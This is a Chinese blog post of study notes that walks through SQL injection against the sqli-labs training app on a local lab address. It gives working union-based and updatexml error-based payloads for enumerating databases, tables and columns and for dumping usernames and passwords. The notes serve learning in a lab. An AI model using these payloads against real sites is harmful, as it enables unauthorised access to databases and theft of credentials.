SQL 注入从入门到实战
398 字
2 分钟
SQL 注入从入门到实战
SQL注入笔记
一、测试有无SQL注入漏洞
http://192.168.26.133/sqli/Less-1/?id=-1输入?id=1能显示,-1不显示,即可判断有sql注入漏洞二、找闭合符号
需要先判断是否是数字还是字符串类型,是字符串才需要找闭合http://192.168.26.133/sqli/Less-1/?id=1'报错就代表找对了常见的闭合符号有'"')")'))"))
http://192.168.26.133/sqli/Less-1/?id=1'--+加入--+注释发现页面又可以正常显示,说明找对了三、测试有多少字段
http://192.168.26.133/sqli/Less-1/?id=1' order by < 这里是输入1-99来测试>--+测试到报错,就可以知道有几个字段,就比如我这个测试到4报错,因为没有第四个字段,可以推测出来有三个字段四、联合查询找回显点
http://192.168.26.133/sqli/Less-1/?id=-1' union select 1,2,3--+id改为-1是为了让他报错,这样才可以显示出来回显点这个网站的回显点是字段2和3五、爆数据库名
http://192.168.26.133/sqli/Less-1/?id=-1' union select 1,2,database()--+database() 是mysql查询数据库的参数version() 是查询数据库版本的参数六、爆所有数据库
http://192.168.26.133/sqli/Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata--+group_concat 是连接字符串七、爆表
http://192.168.26.133/sqli/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+table_schema 表的数据库八、爆字段
http://192.168.26.133/sqli/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+九、爆数据
http://192.168.26.133/sqli/Less-1/?id=-1' union select 1,2,group_concat(username,password) from security.users--+十、报错查询
http://192.168.26.133/sqli/Less-5/?id=1'and updatexml(1,concat('$',(select database()),'$'),1)--+主要使用的是updatexml(1,(concat('$',(sql 命令),'$')),1)
爆所有数据库http://192.168.26.133/sqli/Less-5/?id=1'and updatexml(1,concat('$',(select schema_name from information_schema.schemata limit 2,1),'$'),1)--+
limit 0,1 0 指的是第几条数据,1是表示取几个,修改0即可
爆表http://192.168.26.133/sqli/Less-5/?id=1'and updatexml(1,concat('$',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'$'),1)--+
爆字段http://192.168.26.133/sqli/Less-5/?id=1'and updatexml(1,concat('$',(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),'$'),1)--+支持与分享
如果这篇文章对你有帮助,欢迎分享给更多人或打赏支持!
相关文章智能推荐
1
PX 12 · PortSwigger 暴力破解全通关笔记
订单班笔记完成 PortSwigger Web Security Academy 中所有 Authentication 类暴力破解实验的实战笔记,覆盖用户名枚举、响应时间侧信道、IP 封锁绕过、账户锁定绕过、单请求多凭据等典型场景。
2
博客重建
技术笔记因为之前我用的是别人的模板,存在些许问题,而且也不是我的,于是就有了这个重构计划
3
思科网络设备常用命令速查
技术笔记涵盖 Cisco 基础命令、HSRP 热备份、链路聚合、NAT 地址转换、访问控制列表、Telnet、生成树与 OSPF 动态路由的配置速查手册。
4
端口大全
技术笔记开发者常用端口速查手册,按端口号排序,覆盖 Web、数据库、中间件、DevOps、网络协议等场景。
5
光纤通信基础知识详解
技术笔记全面梳理光纤结构、单多模对比、连接器类型、损耗衰减、色散、波长窗口、光模块匹配及施工维护要点,附快速记忆口诀。
随机文章随机推荐













